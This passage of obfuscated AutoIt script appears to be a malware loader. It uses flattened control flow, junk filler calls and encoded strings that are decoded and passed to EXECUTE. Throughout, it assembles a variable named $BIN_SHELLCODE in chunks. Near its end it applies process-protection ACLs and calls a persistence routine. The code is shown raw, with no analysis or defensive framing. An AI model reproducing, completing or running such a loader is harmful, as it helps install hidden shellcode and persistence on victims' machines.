("61..,5..8,..4,..3,..6,5,..6,6..,6..,6,..5..8,..53,5..8..,55..,58..,55..,5..9,1,53..,..57..,58,55,..5..8,..55..,..58" , ".." ) ) DIM $TS2CHUYL1PUEWQ2JODNV = 1418218 + 567903 + 926522 + 4292649082 + 4292096687 + 4294442025 + 4292394753 $656182541 = 706340665 ENDIF IF $656182541 = 1469834065 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..6,..57,..1,5..3,..5..7..,5..3,56,..5..8,5..5..,..5..3..,57,..6..1..,62,..57..,4..,6..,5..7..,5..6..,2..,..6..1,..6..,1..,..5..7..,..53.." , ".." ) ) DIM $OT4KFQUHLQSIWWDAIMOA = "C3AhUA2jHDapMGMyHT7m" $656182541 = 1599451200 ENDIF IF $656182541 = 1477365537 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,3,53..,..5..6..,4,58..,..5..3,5..7,..58,5..3..,53..,53..,..5..3,53..,6,6..1..,..57,6..,3,..53..,55,53..,53..,..5..3..,53.." , ".." ) ) INT (70644 ) $656182541 = 2054240656 ENDIF IF $656182541 = 1479637702 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,53..,..5..3..,..53..,..53,5..9..,1,..57,5..3,..59,..6..1,53,..5..3..,..56..,5..3,53..,..53,..5..3..,5..3,6..,..6..,..6..0,59..,58..,..53" , ".." ) ) $656182541 = 1038131997 ISSTRING ("0CyeXr3UZ1cb3rXiTBsiFj1dY9JbWVW5e7gTMOMZfDAjdSJiATdxkuqQLvqYS28eeg76keEdYCdbSR9fzBKdRyVUQzhry" ) MOD (2052693 , 1447557 ) ENDIF IF $656182541 = 1508795126 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..61..,..5..3..,..53..,..5..3..,5..3,..53..,..58,60..,..5..8..,..5..6,..6,..6,..58..,..58..,..3,..57..,..6..1..,5..8..,3..,53..,..5..3,..6,..6..1,..57.." , ".." ) ) $656182541 = 1750055196 RANDOM (1449126 ) ENDIF IF $656182541 = 1513972166 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6,..6,5..6,..56,..3..,5..3,..5..8,6,..58,5..,..5..8..,..2,..61,..2,..5,..58..,58,4,3,55..,..5..3..,..3..,53,5..3" , ".." ) ) INT (951421 ) $656182541 = 1974167312 STRING ("pr5xOvnqU6mN8vZFvLduXEnZRZeBBBm6nB16K8zJGwmzbu" ) CHR (2887679 ) ENDIF IF $656182541 = 1569955931 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,4..,6..1..,5..7..,56,..58,53,..61,..62..,58..,..4..,..6,..3..,..6,..6,5..8,..58,5,..61..,..5..9..,..1,..57,5..7..,6..1,..4" , ".." ) ) INT (3397414 ) $656182541 = 1974292710 DIM $FQ0RVYSUQAGD35WLCXAS = "YwoSaTZ3Ow1g2EsJsVH3QV4d1HXphYdjCortKIUfD0KdQxaAdLkb3yidBl1B5JW0tRMNm98TaBzZj0wCHwlEMbqego1zSsk3e" RANDOM (3022268 ) ENDIF IF $656182541 = 1577105263 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..5..8..,..4,..6..,3,5..6,56..,..6,6..,..6..1..,..56..,..6..0,..4..,..4..,6..1..,..53..,..5..3,..60..,5..7..,..53,..60,5..8,..6..0..,6,..6" , ".." ) ) $656182541 = 172415000 ENDIF IF $656182541 = 1586164444 THEN LOCAL $RET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50..,57,..5..7..,..59,3..,59..,..3,..57..,5..6,59..,5..4..,..5..9..,..3..,5..9..,..3..,..5..7,5..4..,..59..,..57,59..,..57,..6..0..,..5..5..,59..,5..8,60..,..5..6..,..6..0,56..,55,61..,5..5,5..5,5..9..,..5..7,6..0,..6..0,59..,6,6..0,55,59..,..5..7,..5..5..,5..5,..55..,..3,5..5,5..3..,5..5,..57,59..,3..,6..0..,5..3,..5..8,56,59..,61..,..59,58,5..9..,..3,59..,..3,5..9,..5..6..,5..9,6,..5..9..,..5..7,..5..9..,..58..,55..,53..,55,..2,55,..53,5..5..,5..5..,56..,53..,..6..0,6..1..,..57..,5..5..,..57..,..58..,55..,55,..55,..3,5..5..,..53,55..,..55..,60,60,6..0..,56,..60..,..57,6..0,5..5,..55..,5..5..,..5..5,..3..,..55,..53,5..5..,5..7..,..60..,..60,58..,53,..5..9..,5..4..,..6..0..,..57..,59,..6..1,..5..5..,..3,55..,53,..55,55,..60,6..0,..6..0,..5..6..,..6..0,..5..7..,..60..,..5..5..,..5..5..,5..5,55,..3,5..5..,5..3..,..5..5,..55" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,5..5..,5..5,..3..,55,53..,5..5..,5..5..,60..,53..,60,57..,..60..,55..,..55,55..,5..5..,3..,..5..5..,5..3..,..5..7,5..7..,..59..,..3..,5..9,3,..58..,5..6..,6..0..,..57..,6..0,5..5,6..0,5..8,59,..56..,..60..,5..7,..5..7,..60..,..5..9..,5..8..,6..0..,57,..58,..5..3..,..6..0,..5..7..,..6..0..,..5..5,55..,..61,..5..5..,..57,..5..7..,..59..,..59..,6..2,5..9..,..3..,59..,..5..8..,..5..8..,6..,58..,56..,..6..0..,57,60..,..55..,60,..5..8..,59,5..6..,..60,..57..,55,62..,..5..5..,..62.." , ".." ) ) ) ) $656182541 = 1205248241 STRING (2218093 + 880111 + 1666509 ) ENDIF IF $656182541 = 1587018324 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1..,..5..3,..56..,5..7,5..8,..6,61,6..1,..62..,61..,5..8,..3..,5..3,..6,3..,6..,6,6,..6..,..61..,4..,6..1,..58..,54..,53" , ".." ) ) RANDOM (529060 ) $656182541 = 1318416169 ISFLOAT ("VygxSkjh1la0fXvpKtxLFYGAIlZp6ezsjCHDEAOUyqycsJDTL28RuOa72OYGv3" ) ENDIF IF $656182541 = 1599451200 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,53,..5..3..,..5..3,..5..3..,6..0..,55..,..6..2,..58,5..6..,..5..6..,..6..,6,..58,..60..,6,..6,6..0,59..,5..8,..5..3..,58..,..5..6,6,6" , ".." ) ) ISFLOAT (1037561 * 629238 + 4292420501 + 983530 ) $656182541 = 90298599 ENDIF IF $656182541 = 1604509846 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6,..6..,..6..,6..,..6..1,4..,5..7,58,..1..,61..,61..,..62,..61..,5..8..,5..6..,..3..,6..,6..,6,6..,..6,6,..61..,..4" , ".." ) ) ISBINARY ("T7DBJL0MiyFf" ) $656182541 = 2060391673 ISBOOL (3447033 * 534323 * 174310 ) ISPTR (1522803 * 3287096 + 965819 ) ENDIF IF $656182541 = 1655436234 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..8,..58..,61..,..2,..5..,..3..,5..8..,..54,5..8..,54..,..58,56,5..8..,..5..9,5..8..,..6..0,..61,..2..,..6..0,..4,..53,..6..1,56..,..56" , ".." ) ) $656182541 = 781366022 ENDIF IF $656182541 = 1700940958 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..7,6,5..7,..5..8,..2..,..6..1,..58..,..5..3..,5,..6..1..,57,55,6,..5,6..,6..,..6,..6..,..6..1..,..2,6..1..,3..,..2..,5..8..,55" , ".." ) ) WINEXISTS ("FoQjXnHg0L35rQpaRcouYtiq75n0QRYForGCWKUj7R8MvmxvDlCMaISmgzm29SAi" ) $656182541 = 496318929 ISFLOAT ("XofsewguE5VG1vDokE" ) INT (1449336 ) ENDIF IF $656182541 = 1713506615 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("55..,..61..,..6,..6,6,6..,6,6..,..6..1,4..,..57..,5..8..,1..,57..,61,..62,6..1..,..58..,5..5..,..3,6..,6..,..6,6,..6" , ".." ) ) $656182541 = 432319576 MOD (1091695 , 3317559 ) ISSTRING ("R7wu5mL1KDBvhv64M2bBZA2R" ) ENDIF IF $656182541 = 1718368979 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6,..6..,6,5..6..,..2,..57..,5..8..,..53..,3,..60..,57,5..4,..5..7..,..61,2..,..5..8,5..8..,6,3,..5..7,59..,..56,2,60" , ".." ) ) $656182541 = 1051260188 RANDOM (980872 ) ENDIF IF $656182541 = 1723957288 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,5..7..,5..7,..5..9..,3,..59,3,5..7..,56..,..59,..54..,..59..,3,..59..,..3,5..5,..61,..5..5,55..,..5..9..,..2,..5..9,58..,..60,..5..5,..5..9,5,..5..9..,5..8,..5..9..,3..,56,5..6..,..56..,..55..,..5..5..,5..5,5..5..,..3..,..55,..53,..55..,55,..59,5..7,60..,..6..0..,..5..9,6,..60,55,5..9,57,5..5..,5..5,55..,..3..,..5..5,..53,55,5..5..,..5..8..,59,..59..,..62..,..6..0,..55..,6..0..,..5..7..,..60..,5..8..,59..,..5..4..,..59..,3..,..57,..59..,..60" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5..,5..9..,5..8,5..9..,..5..8,5..5,..55,..5..5,..3,..5..5..,..5..3,55,..5..5,5..9..,57..,60,60..,..59..,..6,60..,..5..5,5..9,5..7..,..55,55,..5..5,..3,..5..5..,..5..3..,..55..,..57,5..9..,..3..,6..0,5..3..,..58..,5..6..,59,..61,..59,58,..5..9..,..3..,5..9..,..3,59..,5..6,..59..,..6..,..59..,57..,5..9..,..58,..5..5,..3,5..5,..5..3..,..55..,5..5..,..5..9,..57,..6..0,..60..,5..9,..6,..60,5..5,5..9,57..,..55..,5..5..,..5..5..,..3..,5..5,5..3,55.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,..5..6,..53..,55,55..,..55,3..,..5..5..,..53,55..,5..5,..59,5..7,6..0..,60,..5..9,..6,..60..,..55,..59,..5..7,55..,..5..5..,..5..5,..3..,..55,5..3..,5..5,55,5..6,..53..,..6..0..,61..,5..6,..6..1,5..6,53..,56,5..3,5..6,..53,55,..5..5..,..5..5,62.." , ".." ) ) ) ) EXITLOOP PTR (2269633 * 1876835 * 3508062 ) ENDIF IF $656182541 = 1745262236 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..6..,..6,..6..0,..5..9,..5..8,5..3,5..9..,..1..,53,..53,6..,6,..58..,..5..8,..6..2..,61..,61..,2..,4..,61..,6..1..,58..,4..,..2.." , ".." ) ) DIM $4T4LGD5XQEO3AFWV4GMM = "RzdXsJEvO9V63mEKE0VnryBl6Hvkh1uUrHn41xX3zbKe47g3qUzRA9lr" $656182541 = 937837217 PTR (895226 + 3244402 ) ISBINARY ("KUgd1XpXxq8BB3wANssw579GcQfXXz4tW5QatNIl6EIJ2sVA1xbRv8dMVIalSCa8wOQGnwg9UgAAxyNU4O5yym8X1coUMxDDEKnnMnmDqb7oHMow5qrcG" ) ENDIF IF $656182541 = 1747756201 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..5..8,3,5..3,53,..6..,..6..1,..5..7..,..60..,..61,..5..3..,..55..,5..3..,5..3,..53..,53..,6..1..,..2..,..5..7,58,2,..3,..56..,2..,..57.." , ".." ) ) DIM $2QKHWVWL75WKAGQBBIWP = 2912788 + 961618 * 3511725 * 1476387 + 1750659 * 3602516 $656182541 = 1942454486 ISBOOL ("4OKLKRBlDjKKfBm48MAwpH9qlabVh5vhzfoSOgNHvR" ) ENDIF IF $656182541 = 1750055196 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,2,..6..,5..,6,6..,..6..,..6..,5..8..,6..0..,..59..,..1,..53..,57..,..6..1..,..4,..57..,..58..,..6..,6..1,58..,..5..3..,..6..1..,..2..,61" , ".." ) ) $656182541 = 1207367525 PTR ("hhOgvOuAKORdIYCkanDp192bImWVuiJ59woaV82ctQd3NMWybO1nu3RioNHj2IfBe" ) ENDIF IF $656182541 = 1791187076 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,5,..5..7,..6,5..,..6..,..6,..6..,6..,56..,..5..6..,..3..,53,..61,6..2..,60..,4,..6,..57..,..59..,..59,56..,..2,57..,5..9" , ".." ) ) DIM $CZBUB5K59W5ZXUQRVJFQ = 388633 * 456518 + 4292093314 + 3032764 + 4292546598 * 3509147 $656182541 = 896046375 PTR (972489 * 3553081 * 2050349 + 961001 ) ENDIF IF $656182541 = 1808850186 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("54..,61,5..3..,..5..6,..3..,6,..61,..6..2..,..58..,58..,6,3,6..1..,..62,..57,..4,..6..,..6..1,61,62,57,..58..,..53..,61..,6..1" , ".." ) ) PTR ("Sl8EDSsJMrkJtlEwYIlA" ) $656182541 = 848901156 DIM $F0Y8O5LAFRJGV06PPKW5 = 3542878 + 3114696 + 3677996 * 2534245 * 2891525 + 1931075 * 1284846 + 4294211399 ENDIF IF $656182541 = 1832168266 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1..,57,1,..4,..5..3..,55..,..53..,53..,53..,5..3..,..6..1..,..4..,..6..1,58,..5..4..,..5..3..,6,..3..,..6,..6..,..6..,6,58..,53,..6.." , ".." ) ) $656182541 = 50926388 MOD (1598641 , 3539042 ) ENDIF IF $656182541 = 1859058315 THEN LOCAL $FILE_STRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50,57..,..5..7,59,3,..59,..3..,5..8..,..56..,60..,..5..7,60,55..,60..,58,5..9,56..,60,5..7..,57..,..5..6,..60,55..,..59,58..,59,..5..4..,60,..57..,..59,5..8,55,61..,..55,..55..,5..9,55..,..60,..6..2,60..,57..,..59..,5..8..,55..,..5..3..,59..,..1,59..,..2,60..,5..6..,5..9,..5..7,..5..9..,5..9,..59..,6..1,..5..9..,2,..59..,..1..,..59,..57..,..60..,..56,6..0,..5..4..,5..9..,61..,..59,..59..,59..,..2..,..5..9,1..,6..0..,54..,60..,5..6,..59..,..61..,59..,57,59,59,5..9..,..2,..5..9..,..1..,..5..9,5..7,60..,5..6,6..0,..5..4..,59,61,59..,..62..,..59..,5..9,..6..0,58..,59..,6..1,60,5..6,..5..9..,..5..7,..6..0..,54,..5..9..,62,..5..9..,5..9,..59..,..55..,..59..,..5..,6..0..,5..9..,5..9,..1..,59..,2,..59,..3..,..60..,..56,..59..,..5..7,..60..,59" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,5..6..,60,5..4,..59..,..5..7..,..5..9..,59,60..,..5..6,..58..,..2,55,..55..,..55,..5..3,55,..5..9..,5..5,..53,..58,..56,..60..,57..,6..0,..5..5..,..59..,62,59,5,59..,6..0,..57,..3,..5..9,..58,5..9,5,5..5,61..,5..5..,57..,5..9..,3,..6..0,..53,57..,..59,..59..,..62,5..9,3,..59..,..5..8..,55..,62..,55,5..3,5..5,..59,55..,5..3,5..5..,..55..,..5..8,..4,..5..5..,5..5,5..5,62" , ".." ) ) ) ) MOD (1417388 , 2000101 ) $656182541 = 1877228926 ENDIF IF $656182541 = 1877228926 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50,5..7..,5..7..,59..,..3,59..,3..,..5..8,5..6..,..60..,..5..7..,6..0..,55,..60..,5..8,..59..,56,6..0..,57,5..8..,..56..,59..,58,..60,..57,57,57,..59,5..4,..6..0..,57..,59..,54..,..5..5..,..6..1,..5..5,..57,..58,..5..6,5..9,..6..1,..59,..5..8..,5..9..,3,59..,..3,..5..9..,56..,5..9,6,..5..9,57..,..59,..58..,58..,..6..,5..8,56,..60,5..7,..60,..5..5,..60..,..58..,59..,..5..6,..6..0,57..,55..,..3,..55..,5..3,5..5..,55..,5..9" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..,5..9,5..9..,5..9..,..57,5..9..,..6..,5..9,62,..5..9,2..,..59..,..1,59,..6..1..,59,..5..9..,59,5..7..,59..,6,..5..9..,62,..6..0..,..54,..59..,..1,..5..9..,59,..59,..6,..5..9..,..62..,59,1,60..,..54..,..5..9..,57..,..6..0..,5..6,59,..6,5..9,..62.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("59,..59,..59,..1..,5..9..,..5..,5..9,5..7..,60..,..5..6,6..0..,..5..4..,..59..,6,59..,..62,59,5..9,59,..57..,..5..9,59..,60,..56..,6..0..,..54,59..,60..,6..0..,..5..6,55..,..5..5..,..5..5,3..,..5..5..,..5..3,5..5..,..5..7,5..7,..5..5,..59..,6..2..,..5..9,..5..,58..,..6,..5..8,5..6,..5..9,..61..,59..,..58,..59..,..3..,..5..9,3..,..5..9..,..5..6..,..59..,6,..5..9..,5..7,..59,5..8..,..55,62.." , ".." ) ) ) ) $656182541 = 9803637 ISFLOAT ("S1mUWVNCDL7HGa78DmSrCGbwD" ) ENDIF IF $656182541 = 1885155689 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6..,..6..,..60,6..2..,..5..6,1..,56,3,5..3..,60,6..1,62,..61,..5..8,..5..5,5..3,6,6,6..,6,6,6,..6..1..,..2.." , ".." ) ) $656182541 = 1970938970 MOD (2335494 , 3656525 ) DIM $JC5CSBSKJYSAEFE1ABUL = 3323231 * 1033960 * 673699 ENDIF IF $656182541 = 1921072536 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..56,56..,..3..,6..2..,61..,..5..6..,..5,..6..1,53,..61,6..1,62,57,..4..,..6,..5..3,1,6..2..,..6..,..5,..6,..6,6..,6.." , ".." ) ) MOD (132187 , 174381 ) $656182541 = 1082073854 PTR (1563163 + 1001748 + 4293192249 ) MOD (2719725 , 1434301 ) ENDIF IF $656182541 = 1922466865 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,..4..,54..,56..,4..,..53..,..2..,3,60,..57,..5..8,61..,..61..,57..,5..7..,..5..5..,..60..,5..5..,..56..,..53..,..6..,3..,60,5..7,5..8.." , ".." ) ) INT (591028 ) $656182541 = 1330478138 WINEXISTS ("9yUWnsW7BIgmwkWRMJVBswyLJvJSUgsiQ30tMOc7XDw1hD8zALFijC" ) ENDIF IF $656182541 = 1924764602 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..6..,..5..7..,6..0..,..57..,62,6..0..,..5..8..,5..,5..3,..58..,..6,61..,2,..3,..5..9,..58..,5..,5..8,..4..,..3,..5..5,..53..,..57,..53" , ".." ) ) $656182541 = 1655436234 MOD (1348810 , 1037731 ) ENDIF IF $656182541 = 1942454486 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("59..,5..6,..57..,60..,..58..,5..3,..6..,5..8,..53,6..,..6..,60..,..58,4,6..1,..6..,6..,..58,..58,2,..5..3..,6..1,5..8..,3..,..53.." , ".." ) ) ISSTRING ("d7GXNY9GDfwkqiKj9mUntDCkoTrcKj8Ef9IILvZuMCOgFHWeUg8sUg" ) $656182541 = 1131844544 ENDIF IF $656182541 = 1947300206 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3,..1,..5..3,61,..3,..60..,61..,..5..8,..59,3,..6..,6..,6,..6,6..,..6..,..5..,..5..6..,..3,..1..,4,..61..,5..3..,..5..6,..3" , ".." ) ) ISSTRING (3735416 + 3465486 ) $656182541 = 116925729 ISBOOL (1547430 + 4291515360 * 1477392 ) ENDIF IF $656182541 = 1970938970 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6..0..,61..,..4..,..5..7,58..,..5,..6..1,3,..6..0,61,..58..,..5..8,..3,6,6,6,6..,..6..,..6,..60..,62,57,..1,6..1.." , ".." ) ) RANDOM (831899 ) $656182541 = 1296565717 ENDIF IF $656182541 = 1974167312 THEN LOCAL $E = EXECUTE PTR (294655 * 3649188 ) $656182541 = 860380632 ISSTRING ("NBDESHu4vFqUhR17tOAjBggAI7s1CJ4uEyboCRJ7ZVzBKp7H57EagkFGvd6VpDAVL5oTQLELfCtRRN0saU5Ff3ot2D2yVYSvtN0Obo2sB25M0YZSnMVE" ) ISFLOAT (2773503 * 755756 * 391473 * 1103808 ) ENDIF IF $656182541 = 1974292710 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,58,..4..,3,6,5..,6,6,..6,6..,..5..8,5..3..,6,6..,..58,..58,5..,..6..1,..59..,..6..1,..3,..3..,..5..3..,5..5,53.." , ".." ) ) STRING ("krV2Len8LCdNkkhdnXy8g8fxQIvaN12AW4dv9L50BVfBWGI4UnHl8eRllxmdSmtUKM1qhWeK1IGv3NLiaAqAtQCSn1jKz2ho" ) $656182541 = 871530397 ISFLOAT ("7i6uyHusHWdcr63A4jjcqMCl8Br4HXBDSNsrwvdk2IKZw0ZrH459FpGuQUw7pAUVtIuNNLdIg8kSbMZiL9vN1B7Bh7KL9f5" ) ENDIF IF $656182541 = 2022545531 THEN #region FLVAxkkwT $656182541 = 1713506615 ISPTR (775609 * 3395171 + 4291409108 ) PTR ("5ovpe" ) ENDIF IF $656182541 = 2032766480 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,..5..6,58..,..59..,..5..8..,6..0,..56..,5..6..,..6,..6,6..1..,62,6..0,..4,..2,..6..1..,59..,..5..7..,6..1..,2,5..6,5..8,..56,..53,..53" , ".." ) ) $656182541 = 116471326 WINEXISTS ("QaAJadT3khcMzuzXEIzxrMIRUTOwR6NlMO76yW2Du5i53K64NtyrlEocAUZrxwm" ) ENDIF IF $656182541 = 2054240656 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56..,..5..6..,3,..5..3,..5..9..,5..9,5..6..,62..,5..8,..5..9,53..,5..7..,53..,6,62,5..7,..3..,53,..56,..4,..5..7,3,53,..5..4,..53.." , ".." ) ) ISPTR ("xSR6cwENXjXUSwHv9iA5EN6Kf8S4BcLmHk5QKpC1HX6QDNNZQh11sB8TW" ) $656182541 = 238457315 ENDIF IF $656182541 = 2057237529 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3,6..,6,6..,6,..6..1,..56,..3..,..5..3,..5..3..,..6..1..,..58..,53..,6..,6,..6..0..,58,4,6..1..,..6,6..,58,5..8,..6..2..,5..7.." , ".." ) ) ISPTR (2376345 + 4293184136 ) $656182541 = 1747756201 ISPTR (2313154 * 2822069 + 423786 ) ENDIF IF $656182541 = 2060391673 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..7..,5..8..,..1..,..53,..61..,62,..6..1,..58..,..5..7..,..5..3..,..6..,6..,..6..,..6..,6..,..6..,..61,4..,..57..,58..,62..,..5..3,61,62..,..61.." , ".." ) ) INT (690914 ) $656182541 = 954977294 DIM $LM4EZYM8LLI3BGXYVHLT = 367976 ENDIF IF $656182541 = 2069227035 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..6,6,..6..0..,..59,..5..8..,5..3,6,6..,..6..0..,..59..,..5..6,..5..7,..6,6,..60..,..5..8,..4..,..61,..6,6,..58,5..8,..3..,..5..3.." , ".." ) ) STRING (3068014 * 2377603 * 2825303 ) $656182541 = 762027222 ENDIF IF $656182541 = 2081176827 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..7,..58..,6..1,..5,2,5..3..,3,..1..,..62..,53..,..53..,..5..3,5..3,..5..3..,5..3..,57,..53..,5..9,1,5..3..,..53,5..8,61,5..3.." , ".." ) ) $656182541 = 1061461686 ENDIF IF $656182541 = 2119340110 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0,..58..,..5..3..,..56,..5..6..,..5..6..,6,6,..57,..6..0,56..,5..6,..4..,55..,..61,..6..2,..6..0,4..,..6..,..5..7..,56,..56,3..,..53,6..1" , ".." ) ) MOD (13383 , 840807 ) $656182541 = 217336870 RANDOM (204136 ) RANDOM (3648981 ) ENDIF NEXT IF $PROTECT THEN ACL ($HANDLEFROMPID ) ENDIF IF $PERSIST THEN QTMVSHRFRD ($RET [ZVTZJDNXHRPQQIM ("53" ) ] ) ENDIF ENDFUNC #endregion FUNC BFSEZOFQQVRV () GLOBAL $1300820860 = 256356752 GLOBAL $AOAMUJVLTV = 2033156 FOR $E = 0 TO 551583 ISPTR (1420540 + 2012189 + 4291840624 + 4292863764 ) IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,..35,4..6,..1..,14,4" , ".." ) ) ) EXITLOOP MOD (2197646 , 498204 ) ENDIF IF $1300820860 = 256356752 THEN #region TuBoprHKA $1300820860 = 176683708 INT (2436641 ) STRING (3043919 * 1765421 ) ENDIF NEXT ENDFUNC FUNC QUBCAHBBZKYJ () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..3..5,4..6,..15..,1..8.." , ".." ) ) ) ENDFUNC FUNC DDKWOYMJJPNF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..3..5..,..4..6,24..,15,18" , ".." ) ) ) ENDFUNC FUNC JWWTSBPFTDYX () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4,38..,..38,3,..2..7..,..38,..3..8" , ".." ) ) ) ENDFUNC FUNC CRAYOQRFEAMS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,..3..8,38..,..1..9,..46..,..4..4,..47,29,46,3..,..44..,..31..,27..,4..6,..31.." , ".." ) ) ) ENDFUNC FUNC BVMQYYKUKURA () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,38..,38,..19..,46..,..44..,4..7..,2..9,..46..,7,3..1,4..6,..4..,..2..7..,4..6..,..27" , ".." ) ) ) ENDFUNC FUNC YRBQDBYJGKXS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5,38,3..1..,..3,38..,..41,..4..5..,3..1.." , ".." ) ) ) ENDFUNC FUNC SHYKZNWGXGSG () GLOBAL $1300820860 = 256356752 GLOBAL $PNXRSOATLI = 3486648 FOR $E = 0 TO 710159 DIM $HNMUDSVCSZ60IMVSF3YB = "JUZSyHbRCVfD3MxDgsoFWuxv2gw74drr0V" IF $1300820860 = 176683708 THEN #endregion STRING (2638799 + 3112428 * 2601353 * 1450734 ) EXITLOOP STRING ("JjEEpwD0sldXzDXNhfDgDNElaETEFzwJOeSiuprG3WvIq9zkdSH33hE5NsEUM8u2YChuWOs1Y7nRr64bfIBX2CRHJWDcVH44BDUY1eyyzQf53XNSxCOdG" ) ENDIF IF $1300820860 = 256356752 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5..,3..8,3..1,3,..4..4..,..31..,27..,46..,3..1..,1..9,34,4..1..,..44,..4..6,29..,..47,4..6.." , ".." ) ) ) STRING (2299404 * 720385 + 391200 + 212652 ) $1300820860 = 176683708 DIM $JAJDWMXWNWIVNS20W4DY = 182921 ENDIF NEXT ENDFUNC FUNC MNIAOQEHLRXV () GLOBAL $1300820860 = 256356752 GLOBAL $NJJZ2JH0FR = 1612056 FOR $E = 0 TO 1284805 ISSTRING ("79591zMXxm6utXd1RVZnLH4ensov8n63URAdwtGXFWAOMnFTnB6iN6kyf1WIkqZjpdJMvaExncR0goAaWFhFqYoYFc8EH8M" ) IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..3..5..,..3..8..,..31,..5..,50..,..3..5..,..4..5,4..6,..4..5.." , ".." ) ) ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN #endregion WINEXISTS ("n7I4Lour0AVXNis2AYWhtb90pyB2ZZ0w3i4IS3MIkUheWk" ) $1300820860 = 176683708 ISBINARY ("V0Wel8SOmXCCbJy4FoUjGlm6I35eeAunz1fFgeSK9ozWRrgDwqB24oAJNZErcNJWBockE2XBFjksWzorXARX8BskAF2rIzHvNMtCo69EDawVehXnJmEL" ) PTR ("1T99E2gKZNifWc1Als7fHgsSORw56x1YtFxmaE9ipjpDOhXkMkVD15yUAquXFlOAXtWpOOAQtZZx0ZcG3lrVMw7xhMVTklLeDYRvuGF7Tekbga3L" ) ENDIF NEXT ENDFUNC FUNC AZMTVPRVIOXM () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,35..,38,31..,..15,4..2..,..31..,40.." , ".." ) ) ) ENDFUNC FUNC WCCBBCANDNZP () RETURN EXECUTE 